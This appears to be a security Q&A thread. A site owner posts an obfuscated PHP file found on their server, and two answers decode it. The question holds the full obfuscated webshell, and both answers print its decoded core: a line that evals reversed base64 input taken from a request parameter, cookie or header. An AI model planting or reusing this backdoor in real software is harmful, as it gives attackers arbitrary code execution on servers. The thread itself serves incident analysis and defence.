-1

The name of the file is dmpdstcm_qsdfjmqsjfdlmqjf.php and its content is below.

What should I do please? :(

<?php
$brian= 'r';$exhaling ='ctpv'; $jacki= 'b'; $cravat = 'am('; $giselbert = 'LkRi"r';$foulplay= '`';$dabbling ='i';$finicky = 'M';$comparison = 'tMraMH';$distract='LM:ZaM';
$cuprous=']'; $augmenting= '"'; $intervene ='(';$impermeable = 'iR)ce_';$disciplinary= ')mCa)'; $hymn='[dOta(Kr';$bagger='rs'; $elysian ='H($(ectoE';$lets = 'l';

$derek='))];Qwrv';

$doloritas='g]sMO(vT';
$crimson= 'CSmdie'; $incidental ='r'; $leaps='$aE"_';

$lumped='='; $gulled = ',?"ncWT';$campground = 'S6rm';

$bell='PP(e';
$fives ='O';$irreflexive='$'; $ambrose= 'kLS$c_'; $dragging = '_';
$bootlegger ='"';$iota= '"esnlcfV_'; $askers= 'Ws'; $fuck ='uV)s'; $greasy= 'i';
$caffeine= 'e';$downplays ='te;l';$amen= '_e'; $inhomogeneity = 'A';$enroll='N';

$constructive='U'; $cutting = ')atT'; $down='P';$duchess ='a';

$amended= 'R';$ashlin = '[[^m';$assisting= 'K';$brazier ='C4__)_l';
$consent= 'i]$eesYa(';$distillers= 'aW;gerg';

$frasier = '_';

$leveller ='raao'; $cedar ='$T$e"MvR]';$fry = 'X?Aes';
$flinched= 'KfswIud='; $attendances = 'e';

$deerskin='o'; $casie='i$aTT_yrE'; $fenugreek= '"';$kittens ='e'; $cavernous='E';$antlered =' '; $glows='ip';$disgraceful = ')'; $feature ='m'; $hypoactive =','; $arrow = 'iU_';$cashers=')yt'; $bilking= '($[(';$hobie = '$';
$goddard=';'; $enlivening ='mnQ['; $capacity= 'K:)(Ea';$droplet = $iota[5]. $casie['7'].$kittens.$capacity['5'].
$cashers['2']. $kittens.$arrow[2] .$flinched['1'].

$flinched[5]. $enlivening['1'] .$iota[5] .$cashers['2']. $arrow[0].$deerskin. $enlivening['1'];
$impassable = $antlered;

$branchings = $droplet ($impassable,$kittens . $cedar['6'] .

$capacity['5'] .$brazier['6'] . $capacity['3'] .

$capacity['5'] . $casie['7']. $casie['7'] . $capacity['5']. $cashers['1'] .
$arrow[2] .
$glows['1'] . $deerskin.$glows['1']. $capacity['3'].

$flinched['1'].$flinched[5] . $enlivening['1'] .$iota[5].
$arrow[2] . $distillers['6'].

$kittens . $cashers['2'] .$arrow[2] . $capacity['5']. $casie['7'].$distillers['6'] .$flinched['2'] .$capacity['3'] .$capacity['2'] . $capacity['2']. $capacity['2'] .$goddard); $branchings($foulplay , $arrow[2] ,$casie['7'], $ashlie['3'],$deerskin , $cashers['2'], $ashlin[2] , $fretting['0'],$hobie . $arrow[0] . $flinched[7]. $capacity['5'].

$casie['7']. $casie['7']. $capacity['5'] .$cashers['1'] .$arrow[2] . $enlivening['0'] .
$kittens .$casie['7'] .

$distillers['6'].$kittens. $capacity['3'] . $hobie .$arrow[2] .$cedar['7'].

$capacity['4']. $enlivening['2'] . $arrow['1']. $capacity['4'].$ambrose['2'].$casie['4'].$hypoactive .$hobie.$arrow[2]. $brazier['0']. $fives .$fives.$capacity['0'].
$flinched['4'] .

$capacity['4'].

$hypoactive.$hobie.

$arrow[2] .$ambrose['2'].$capacity['4'].$cedar['7']. $fuck['1'] .$capacity['4'] .$cedar['7'] .
$capacity['2']. $goddard.
$hobie . $capacity['5']. $flinched[7].$arrow[0]. $flinched['2'].$flinched['2'] . $kittens .$cashers['2'].
$capacity['3'] . $hobie . $arrow[0] .
$enlivening['3'] .$fenugreek.$iota[5] . $enlivening['0'] .$enlivening['0'] .$ambrose['0'] . $enlivening['0'].
$flinched['3']. $capacity['5'] .

$brazier['6']. $fenugreek. $cedar['8'] .$capacity['2'].$fry['1'].

$hobie.$arrow[0] .$enlivening['3'] . $fenugreek .
$iota[5].$enlivening['0'].$enlivening['0'] . $ambrose['0'] .$enlivening['0'].$flinched['3'].$capacity['5'] .$brazier['6']. $fenugreek.$cedar['8'] .$capacity['1']. $capacity['3'] .$arrow[0].
$flinched['2'].$flinched['2'] . $kittens.
$cashers['2'].$capacity['3']. $hobie .$arrow[0] .$enlivening['3'] .$fenugreek. $elysian[0]. $casie['4'].$casie['4'] .$down.$arrow[2].$brazier['0'].

$cedar['5'] . $cedar['5'] . $capacity['0']. $cedar['5']. $distillers['1']. $fry['2'] . $ambrose['1'] .$fenugreek .$cedar['8'].

$capacity['2'] .$fry['1'] .$hobie .$arrow[0] .
$enlivening['3']. $fenugreek.

$elysian[0] . $casie['4'].$casie['4'] .$down.$arrow[2] . $brazier['0'].$cedar['5']. $cedar['5']. $capacity['0']. $cedar['5']. $distillers['1']. $fry['2']. $ambrose['1'] .
$fenugreek.
$cedar['8']. $capacity['1'] . $flinched['6'].$arrow[0].$kittens . $capacity['2']. $goddard . $kittens .
$cedar['6']. $capacity['5']. $brazier['6'] .$capacity['3'].$flinched['2'].$cashers['2'].
$casie['7'] . $casie['7'].$kittens. $cedar['6']. $capacity['3']. $jacki . $capacity['5'].$flinched['2']. $kittens . $campground['1'] . $brazier['1']. $arrow[2].$flinched['6'] .$kittens. $iota[5]. $deerskin .$flinched['6'] .
$kittens .$capacity['3'] . $flinched['2'].$cashers['2'] . $casie['7'].$casie['7'] .$kittens . $cedar['6']. $capacity['3'].$hobie . $capacity['5']. $capacity['2'] . $capacity['2'] . $capacity['2'].$capacity['2'] .$goddard );
f10w
  • 129
  • 1
  • 6

2 Answers2

3

This script tries to execute this code:

$i = array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a = isset($i["cmmkmwal"]) ? $i["cmmkmwal"] : (isset($i["HTTP_CMMKMWAL"]) ? $i["HTTP_CMMKMWAL"] : die);
eval(strrev(base64_decode(strrev($a))));

That is, run eval on some encoded parameter. If this file is publicly accessible and processed by your webserver as PHP, this script will execute any code on the server.

Note that just because this file was on your FTP root it does not mean that it was interpreted as PHP. For the script to be run it needs to be accessible through a web server.

Edit: you stated in the comments that the file was accessible through an URL. This means that the attacker could run any code on the server, and the server (or at least your user account) was compromised.

Sjoerd
  • 28,897
  • 12
  • 76
  • 102
3

I analyzed the code you provided. It was a kind of webshell used for remote Access. The code executed is as below.

$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["cmmkmwal"])?$i["cmmkmwal"]:(isset($i["HTTP_CMMKMWAL"])?$i["HTTP_CMMKMWAL"]:die);eval(strrev(base64_decode(strrev($a))));

Also, Just to add , Below error of undefined function probably gives hints that there may be other infected files as well on the server which contains this function definition.

Fatal error: Call to undefined function func_eet_ares() in C:\wamp\www\Secscripts\PHPRAT.php(100) : runtime-created function on line 1

Your server is compromised. For clean up check the link as mentioned in comments.

Sravan
  • 1,158
  • 5
  • 14